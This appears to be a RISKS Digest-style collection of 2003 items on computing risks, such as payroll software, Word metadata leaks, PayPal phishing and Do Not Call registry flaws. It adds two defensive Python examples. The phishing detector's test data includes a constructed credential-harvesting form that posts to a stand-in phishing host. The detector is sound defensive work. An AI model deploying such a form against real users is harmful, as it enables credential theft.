The German government has a little problem. Up until now all of the civil servants have been paid according to a pay scale that is the same throughout Germany. The salaries are paid out by the states, but the federal government determines the pay level. The company SAP has developed payroll software for the civil service that many states in Germany use. When a new payscale goes into effect, they just issue a table update, and everything is fine. Now suddenly the states are rebelling: Berlin has left the fold, and just this week concocted a wacky payment system. Certain extras are being cut, others kept, pay is being cut either 8, 10 or 12 percent depending on what scale people are in, the work week is to be decreased by 2 hours a week for most of them, etc. etc. No one really understands it, except that Berlin is broke and is trying to save money any way it can. The changes are to go into effect immediately - except that there's the slight problem with the payroll system. It assumes the same tariffs as everywhere..... Looks like the folks down at SAP are going to have their vacations canceled, as they try to whip up programs to institute this payment schedule change. Or as a colleague once said many, many years ago: No one can be *that* crazy.... only to discover a few months later that there really was someone with a really crazy schema for organizing stuff. Prof. Dr. Debora Weber-Wulff, FHTW Berlin, FB 4, Internationale Medieninformatik Treskowallee 8, 10313 Berlin +49-30-5019-2320
Avweb Newswire (http://www.avweb.com/newswire/9_27b/complete/185253-1.html): "In Europe last week, French fighter jets almost shot down a civilian helicopter that wandered over Lake Geneva, after a Swiss controller jokingly labelled the helicopter as 'al-Qaeda' on his radar screen." Ian Chard RHCE Unix systems administrator E: email@example.com European IT, Cadence Design Systems Ltd T: +44 (0)1506 595019 The Alba Campus, Livingston, Scotland EH54 7HH M: +44 (0)7901 855073
Article in *NewScientist* about an interesting new technique for keeping airliners from crashing into skyscrapers: http://www.newscientist.com/news/news.jsp?id=ns99993893 The proposal suggests modifying the avionics in aircraft so that the plane would fight any efforts by the pilot to fly into restricted airspace. So if a plane was flying with a no-fly-zone to the left, and the pilot started banking left to enter the zone, the avionics would counter by banking right. Lee's system, called "soft walls", would first gently resist the pilot, and then become increasingly forceful until it prevailed. The risks of this technique I leave as an exercise to the reader. Chris Meadows aka Robotech_Master firstname.lastname@example.org http://www.eyrie.org/~robotech
Edward Lee, at U.C. Berkeley, is proposing to implement no-fly zones around skyscrapers (and avoid a repeat of the 9/11 massacre) by using GPS to override the controls of civilian aircraft. Based on a database (in the aircraft) of building locations, the on-board avionics would force the controls of large airplanes to prevent them from flying into large buildings (with presumably known locations). There's an interesting article in this week's New Scientist (http://www.newscientist.com/news/news.jsp?id=ns99993893) that talks about Lee's system and relates it to other ideas for counter-terrorism. Interestingly, one advantage that Lee uses is that other systems require radio links with the ground and therefore "can be jammed, or hacked into" (while, presumably, GPS cannot?). Not surprisingly, Lee says that pilots are "openly hostile" to the idea. It seems to me that the system falls prey to a weakness that so many pseudo-security systems do: it's in essence a cooperative system, rather than a pre-emptive one (by analogy to multitasking in the computing world). Even assuming the avionics work flawlessly, it would be impossible to install the "soft wall" system on every airplane in the country, let alone the world — and it only takes one airplane with the soft-wall avionics missing or disabled, to defeat the purpose of the whole system.
The Wall Street Journal today (7/3/03) reported that a mistaken order on the Chicago Board of Trade's "e-mini Dow Jones Industrial Average Futures" caused wild market swings today. Apparently an order to sell 10,000 contracts instead of 100 was put in by mistake. This caused the market, which had been on the upswing that day, to plunge downwards in both the Chicago Board of Trade and the Chicago Mercantile Exchange. Several traders reported assuming that some bad news such as a terrorist attack had sparked the sell-off. The RISK of a typo on an electronic system causing financial havoc is once again made clear. Conrad Heiney email@example.com http://fringehead.org
$180 million at $500 a month, Vickie Chachere, Associated Press, 28 Jun 2003 A man who schemed to steal satellite television signals now has something much bigger than a cable bill to pay — a whopping $180 million restitution order on which he is to make $500 monthly payments. http://www.orlandosentinel.com/news/orl-locpayback28062803jun28,0,5719929.story http://yro.slashdot.org/yro/03/06/28/181227.shtml
From today's *Melbourne Age*: According to reports on local radio this morning, the lady in question was in possession of a branded boarding pass which clearly identified her carrier as Cathay Pacific not Qantas. One has to question our reliance on technology when even holding a branded boarding pass, a passenger can inadvertently walk onto the wrong flight and end up not only in a different country, but a different hemisphere to boot! http://www.theage.com.au/articles/2003/07/08/1057430177680.html
In a NY Times story about the effects of NY City budget cuts: http://www.nytimes.com/2003/07/07/nyregion/07BLOC.html?pagewanted=print (link free until July 13 or so, after that they charge), there is a discussion of yet another multi-million dollar software development failure: Eight years ago, at the urging of [...] funeral directors, the city agreed to develop a computerized registration system [for the filing of death certificates]. About $3.2 million was spent to design one, according to an audit released on June 23 by the city comptroller. Then the plans were abandoned when the prototype system developed serious problems, like registering some men as having been pregnant when they died. The city now plans to spend $1.8 million more for project design. The comptroller's audit called the aborted plans "a monumental waste" of taxpayer dollars. The NYC Comptroller's press release announcing the audit is at: http://www.comptroller.nyc.gov/press/2001_releases/01-08-055.shtm There it is mentioned that the city Health Department, in charge of the software development, violated both City and State procurement procedures in using an existing contract with IBM for "computer maintenance" to develop the new software system. The full bill for the system so far is more like $9-$10 million. The system still does not work, and the Health Department has issued a new RFP for the project that does not contain any references to the old system, so it appears they intend to throw it away. The audit is available at: http://www.comptroller.nyc.gov/bureaus/audit/06-23-03_7A03-073.shtm The Comptroller quickly reaches to the heart of the matter: "[...] the Department did not employ a formal systems development methodology or an independent software quality assurance consultant [as required by City rules, which] contributed to the apparent failure of this project."
Meanwhile, across the river in New Jersey, a similar project was completed by leveraging an existing Sybase system from the New York State Department of Health, taking only six months and $250,000.
http://www.washingtonpost.com/wp-dyn/articles/A33576-2003Jun25.html Although this article is focusing more on the local Prince George's County police force and detective function — which has gotten a lot of bad press here in the DC area for quite a long time — I think the message that is being missed is that technology can give the exact opposite result from that intended. Photographs from ATM cameras linked with ATM card usage and the system clocks are supposed to provide exact measures of events. However, if the ones using the data do not carefully collect it and interpret it correctly, then — as this article states — three apparently innocent people are arrested and held for 22 days. Humans cannot be completely removed from processes that have severe consequences, but the humans that are left "in the loop" must understand that what they do has severe consequences. They should, therefore, be very careful about what the "system" is telling them. In this case, the detention of the three innocent people has allowed a killer at least 22 days to get away.
CASPIAN asks, "How can we trust these people with our personal data?" CASPIAN (Consumers Against Supermarket Privacy Invasion and Numbering) says anyone can download revealing documents labeled "confidential" from the home page of the MIT Auto-ID Center Web site in two mouse clicks. The Auto-ID Center is the organization entrusted with developing a global Internet infrastructure for radio frequency identification (RFID). Their plans are to tag all the objects manufactured on the planet with RFID chips and track them via the Internet. Privacy advocates are alarmed about the Center's plans because RFID technology could enable businesses to collect an unprecedented amount of information about consumers' possessions and physical movements. They point out that consumers might not even know they're being surveilled since tiny RFID chips can be embedded in plastic, sewn into the seams of garments, or otherwise hidden. ... http://www.nocards.org/press/pressrelease07-07-03_1.shtml
Hiawatha Bray, *The Boston Globe*, 4 Jul 2003 Annoyed by the prospect of a massive new federal surveillance system, two researchers at the Massachusetts Institute of Technology are celebrating the Fourth of July with a new Internet service that will let citizens create dossiers on government officials. The system will start by offering standard background information on politicians, but then go one bold step further, by asking Internet users to submit their own intelligence reports on government officials — reports that will be published with no effort to verify their accuracy. "It's sort of a citizen's intelligence agency," said Chris Csikszentmihalyi, assistant professor at the MIT Media Lab. He and graduate student Ryan McKinley created the Government Information Awareness (GIA) project as a response to the US government's Total Information Awareness program (TIA). ... http://www.boston.com/dailyglobe2/185/business/Website_turns_tables_on_government_officials+.shtml
Anonymous organizers of a Web-vandalizing contest this weekend say that the goal will be to deface 6,000 Web sites in six hours, with winners to be awarded prizes such as Web hosting space and Internet domain names. Pete Allor of Internet Security Systems Inc., which runs a threat-detection service, cautions Web operators: "The problem is now, and you shouldn't wait until Sunday to address it." (Atlanta Journal-Constitution 3 Jul 2003) http://www.ajc.com/business/content/business/0703/03hacker.html NewsScan Daily, 3 Jul 2003 [Apparently mostly small sites were hit. PGN]
Knowing which location register (cell-phone networks use, essentially, remote procedure call with callbacks between "location registers" to authorize outbound calls, correctly route inbound calls, etc.) a phone is currently active on, or has recently been active on, is *not* the same as knowing where a phone is with GPS precision, nor even the same as knowing which cell site a phone is currently speaking to. Logs of transitions between LRs ("roaming", even if that hardly exists from most customers' points of view any longer) are useful and probably even necessary for diagnosing connectivity and billing problems and for settling accounts among providers.
Microsoft Word documents are notorious for containing private information in file headers which people would sometimes rather not share. The British government of Tony Blair just learned this lesson the hard way. Last week, Alastair Campbell, Blair's Director of Communications and Strategy, was in the hot seat in British Parliament hearings explaining what roles four of his employees played in the creation of a plagiarized dossier on Iraq which the UK government published in February 2003. The names of these four employees were found hidden inside of a Microsoft Word file of the Iraq dossier which was posted on the 10 Downing Street Web site for use by the press. The "dodgy dossier" as it became known in the British press raised serious questions about the quality of British intelligence before the second Iraq war. I wrote an article for my Web site about how a bit of computer forensics analysis played a role in this controversy: http://www.ComputerBytesMan.com/privacy/blair.htm Richard M. Smith http://www.ComputerBytesMan.com
The British government learned the hard way about how Microsoft Word documents keep a revision history: http://www.wsws.org/articles/2003/feb2003/cnew-f10.shtml http://www.computerbytesman.com/privacy/blair.htm http://www.abc.net.au/pm/s779254.htm The original analysis was supposedly this: http://www.casi.org.uk/discuss/2003/msg00457.html This is nothing new of course: see RISKS 20.83, 20.28, 17.76, 19.97, 18.46, 18.44, 18.41, etc. This problem goes back to (at least) 1996 (RISKS 17.76) and yet people are still bitten by this bug(?). The more things change... David Magda <dmagda at ee.ryerson.ca>, http://www.magda.ca/
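An added example, not from either poster above: a Python scanner for the kind of hidden metadata the two items describe (author names, revision count, tracked changes). It reads the modern .docx (OOXML) package rather than the 2003-era binary .doc, and the minimal package it inspects is constructed inline so the check runs offline.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# OOXML namespaces used by docProps/core.xml and word/document.xml
NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "w": "http://schemas.openxmlformats.org/wordprocessingml/2006/main",
}
W = "{%s}" % NS["w"]


def hidden_metadata(docx_bytes):
    """Report the names and revision traces a .docx would leak if published as-is."""
    report = {"authors": set(), "revision": None, "tracked_changes": 0}
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        names = set(z.namelist())
        if "docProps/core.xml" in names:
            core = ET.fromstring(z.read("docProps/core.xml"))
            for tag in ("dc:creator", "cp:lastModifiedBy"):
                el = core.find(tag, NS)
                if el is not None and el.text:
                    report["authors"].add(el.text.strip())
            rev = core.find("cp:revision", NS)
            if rev is not None and rev.text:
                report["revision"] = int(rev.text)
        if "word/document.xml" in names:
            doc = ET.fromstring(z.read("word/document.xml"))
            # w:ins / w:del are tracked-change markers; each carries its author
            for el in doc.iter():
                if el.tag in (W + "ins", W + "del"):
                    report["tracked_changes"] += 1
                    author = el.get(W + "author")
                    if author:
                        report["authors"].add(author)
    return report


# Constructed minimal package: only the two parts the scanner looks at,
# with a deleted (tracked) sentence still embedded in the body.
CORE_XML = """<cp:coreProperties
 xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"
 xmlns:dc="http://purl.org/dc/elements/1.1/">
  <dc:creator>A. Author</dc:creator>
  <cp:lastModifiedBy>B. Editor</cp:lastModifiedBy>
  <cp:revision>17</cp:revision>
</cp:coreProperties>"""

DOCUMENT_XML = """<w:document
 xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:body><w:p>
    <w:r><w:t>Published text.</w:t></w:r>
    <w:del w:id="1" w:author="C. Drafter" w:date="2003-02-01T10:00:00Z">
      <w:r><w:delText>sentence removed before release</w:delText></w:r>
    </w:del>
  </w:p></w:body>
</w:document>"""


def build_sample_docx():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("docProps/core.xml", CORE_XML)
        z.writestr("word/document.xml", DOCUMENT_XML)
    return buf.getvalue()


if __name__ == "__main__":
    print(hidden_metadata(build_sample_docx()))
```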
I don't know exactly what it is about PayPal (as compared with any other e-commerce sort of thing)...I seem to get more scam e-mails targeting them than anything else, and all of these e-mails seem to look very similar. They all appear to be from PayPal, and include HTML forms with legitimate PayPal images and have links with real PayPal URLs. The kicker is always that the submit button takes you to a non-PayPal site. The newest variant is a bit more insidious than the previous ones I've received. The submit button, as usual, takes you to a non-PayPal site, but appears to immediately re-direct you to a valid PayPal page. You have to either be looking in the page source for the non-PayPal URL or be *very* quick to notice that you are going to a non-PayPal URL, first. And even the non-PayPal URL might be a little hard for a naive user to catch, assuming they were fast enough to see it: http://firstname.lastname@example.org/paypal/paypal.php
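An added example, not from the poster: a Python check of the kind a mail gateway could run over an HTML message like the one described, flagging every form action or link whose real host lies outside the trusted domain. The sample message and the host names in it are constructed; urlsplit().hostname is used because it discards the "user@" prefix that makes such URLs hard to read by eye.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit


class _TargetCollector(HTMLParser):
    """Collect every URL the message can send the reader or their data to."""

    def __init__(self):
        super().__init__()
        self.forms = []   # form action URLs (where the submit button really goes)
        self.links = []   # anchor hrefs (usually genuine, to build trust)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.forms.append(a["action"])
        elif tag == "a" and a.get("href"):
            self.links.append(a["href"])


def host_of(url):
    """Host the browser would actually connect to. urlsplit().hostname drops any
    'user:pass@' part, so 'http://www.paypal.com@phish.example/' -> 'phish.example'."""
    return urlsplit(url).hostname


def under_domain(host, domain):
    return host == domain or host.endswith("." + domain)


def suspicious_submit_targets(html, trusted_domain):
    """Return (kind, url, real_host) for every form action or link that does not
    resolve to the trusted domain. Relative and scheme-less targets are flagged too."""
    p = _TargetCollector()
    p.feed(html)
    findings = []
    for kind, urls in (("form", p.forms), ("a", p.links)):
        for u in urls:
            h = host_of(u)
            if h is None or not under_domain(h, trusted_domain):
                findings.append((kind, u, h))
    return findings


# Constructed sample: genuine-looking images and links, but the form posts
# elsewhere, using the user@host trick to show a familiar name first.
SAMPLE_MAIL = """
<html><body>
<img src="https://www.paypal.com/images/logo.gif">
<p>Please <a href="https://www.paypal.com/help">confirm your account</a>.</p>
<form method="post" action="http://www.paypal.com@phish.example/paypal/paypal.php">
  <input name="email"><input name="password" type="password">
  <input type="submit" value="Log In">
</form>
</body></html>
"""

if __name__ == "__main__":
    for finding in suspicious_submit_targets(SAMPLE_MAIL, "paypal.com"):
        print(finding)
```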
It is worth noting that the computerized voting system used by the Israeli Knesset has, as far as I know, no security whatsoever. It consists solely of a station of buttons at each Member of Knesset's (MK's) seat for him/her to use to register his/her vote. No authentication is required for casting a vote. All an MK has to do to cast someone else's vote is to lean over and push the desired button at the other MK's station. In contrast, the electronic voting stations in the US House of Representatives require a "Vote-ID" card to be inserted before a Congressman can vote. Furthermore, there are many fewer stations than seats (Congressmen line up to vote at the stations), so I suspect that the stations all have cameras trained on them throughout each vote, such that if there is suspicion of wrong-doing after a vote, it is straightforward to replay the video to find out who voted twice. The US Senate has no electronic voting equipment — counted votes are conducted by roll-call or paper ballot. This is surely far from the first time that MKs have voted for each other. In fact, I find myself wondering not how this could be allowed to happen, but rather why a fuss is being made about this particular instance of it. If the Knesset really wanted to prevent it, they could do so, so it seems to me that they haven't seen it as a problem. Perhaps the culture within Israel's government is changing, such that what was previously acceptable behavior is becoming unacceptable.
RISKS has previously pointed out the awkwardness that can result from inadvertently tapping an auto-dial button on a cellphone. We now have a burglar who will have quite a bit of spare time to study RISKS. Per the *NY Post* article, excerpts attached: "It seems Boylan accidentally hit the redial button on his cell phone during a burglary - providing the break-in victim with a voice-mail recording of the crime in progress, said Detective Lt. Steve Skrynecki. "Before the 3:20 a.m. burglary on Sunday, Boylan had called the victim's girlfriend on her cell and spoke to the victim, the detective said. "Somehow, Boylan "inadvertently hit the redial on his cell phone" while he and his buddy ransacked the house and chatted as they grabbed a video-game player, game cartridges, a remote-controlled car and an antique bayonet, Skrynecki said. "They had no idea their crime-scene commentary was being recorded on the girlfriend's voice mail, Skrynecki said. http://nypost.com/news/regionalnews/2178.htm
Nearly one-fourth of the consumers who tried to sign up for the Federal Trade Commission's Do Not Call database haven't completed the process, the agency said Monday. The agency blames in part a series of technological glitches, including aggressive spam filtering by e-mail providers that accidentally deleted some confirmation e-mails sent by the FTC. But many consumers just haven't replied to the FTC e-mail, which is the final step in the sign-up process, said FTC attorney Eileen Harrington. [Source: Bob Sullivan, Three million consumers didn't finish sign-up process, MSNBC, 30 Jun 2003] http://www.msnbc.com/news/933138.asp
I found my way to the Web site for the national Do Not Call registry, through the CDT Web site. With great cheerfulness, I registered my two phone numbers. I followed the instructions: I entered my phone numbers and one of my e-mail addresses. I received the automatic e-mails generated by the registry Web site, and followed their instructions, which were simply to click on a link in the e-mail and print out the confirmation on the linked Web page. "How simple!" thought I to myself. "What a blessing! With no effort at all, I am relieved of countless nuisance calls that interrupt my otherwise hectic dinner!" "But wait a bit! How does it know that the e-mail address I entered corresponds to someone who legitimately has the rights to put my number on the Do Not Call registry? Oh well...I guess it doesn't matter...suppose I go out of my way to take someone else off the list...are they going to cry because they don't get a lot of telemarketing calls? I guess not. No problem!" "Oh, but wait...I think I saw a 'delete registration' button..." Yup. It works the same way. Type in a phone number and your favorite e-mail address, and you can make sure that that number is not on the do not call registry!
Like many other people, I registered at www.donotcall.gov the other day. It seems like they are using a "validation" technique that is often used for e-mail lists: contact the e-mail given to see if it really belongs to the person trying to subscribe. Alas, this does no good when you contact an e-mail to validate a phone number.
Assume for a moment, that do not call/do not spam lists are found to be invalid/unenforceable/unconstitutional. 'They', now, have all the valid e-mail addresses and phone numbers anyone could want.
What are the RISKs of a do-not-call (or do-not-e-mail) list? How does this process work? Does a telemarketer purchase a copy of the do-not-call list, or does the telemarketer submit his own copy and get back a list of rejections? Since conducting surveys is apparently still allowed under the new law, will telemarketers use the do-not-call list but employ a pseudo-survey marketing tactic? Or will the free market dictate that calling the unwilling is not a money-making proposition? Or is the list seeded with honey pots to facilitate catching violators? I find myself afraid to sign up.